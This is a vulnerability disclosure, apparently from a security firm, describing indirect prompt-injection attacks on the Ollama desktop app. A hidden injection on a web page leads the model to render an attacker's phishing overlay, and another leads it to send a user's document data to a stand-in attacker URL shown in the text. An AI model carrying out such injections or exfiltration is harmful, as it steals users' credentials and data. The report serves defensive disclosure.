Solutions

Industries

Partners

Resources

Book a Demo

Threat Intelligence

Table of Content

Unpatched Ollama Vulnerabilities: Phishing Overlays and Data Exfiltration

Ollama’s desktop app is vulnerable to phishing overlay and data exfiltration attacks via indirect prompt injection, overwriting the app with an attacker’s site.

A hidden prompt injection in Ollama leads to phishing overlays and data exfiltration

Context

Ollama is a leading tool for leveraging AI models, with over 170,000 stars on GitHub. Multiple vulnerabilities in the desktop app have been identified, enabling phishing and data exfiltration attacks.

The entire Ollama desktop interface can be overwritten by an attacker-controlled website via an indirect prompt-injection attack due to insecure rendering of model outputs.

Three zero-click data exfiltration vectors exploitable via indirect prompt injection were also identified.

Note: No human-in-the-loop approval steps are required for any attacks in this article.

These vulnerabilities were reported to the Ollama team on Dec 18, 2025, but no response was received despite four additional follow-ups. To ensure users are aware of these risks, this report is being disclosed publicly.

The Attack Chain

  1. The user asks Ollama about an external website or externally-sourced file

    Ollama user asks AI for help with an online guide


  2. A prompt injection is hidden on the external site in 1 pt font white-on-white text

    The online guide contains a hidden prompt injection

  1. The AI model is manipulated to output malicious HTML, overwriting the user interface with an attacker-controlled website

    The AI model is manipulated to believe it must output an HTML element as part of its explanation to the user.

    Note: Quitting and re-opening Ollama does not close the malicious overlay.

    An attacker's phishing site renders over the Ollama interface


  2. The attacker logs the credentials entered into the malicious overlay

    The attacker's server logs display the victim's credentials

Data Exfiltration Attacks

In addition to the phishing risk noted above, three zero-click data exfiltration vectors that are exploitable via indirect prompt injection were identified.

  • Data exfiltration via insecure web search tooling

  • Data exfiltration via insecure rendering of Markdown image outputs

  • Data exfiltration via insecure rendering of external HTML elements

Below is a data exfiltration attack chain that weaponizes insecure web search tooling:

Note: This attack uses the same malicious website, but with a different prompt injection.

  1. A data source with a prompt injection is ingested (website, document, etc.)

    The user asks Ollama for help understanding an online guide


  2. AI is manipulated to access a malicious URL, exfiltrating data from documents the user has been working with

    The model is manipulated to construct a URL using the attacker’s domain, with data from the victim’s previously uploaded documents stored in query parameters.

    attacker.com/?data={AI puts the user’s data here}

    Data is exfiltrated when the model makes a request to an attacker-controlled URL


  3. The attacker’s server logs the model’s request, including the victim’s data

The attacker can read the exfiltrated data from their server logs


Responsible Disclosure

These vulnerabilities were reported to the Ollama team on Dec 18, 2025, but no response was received despite four additional follow-ups. To ensure users are aware of these risks, this report is being disclosed publicly.

Timeline

Dec 18, 2025    PromptArmor discloses to Ollama
Jan 20, 2026    PromptArmor follows up
Jan 26, 2026    PromptArmor follows up
Jan 29, 2026    PromptArmor follows up
Feb 19, 2026    PromptArmor follows up
May 28, 2026  Article published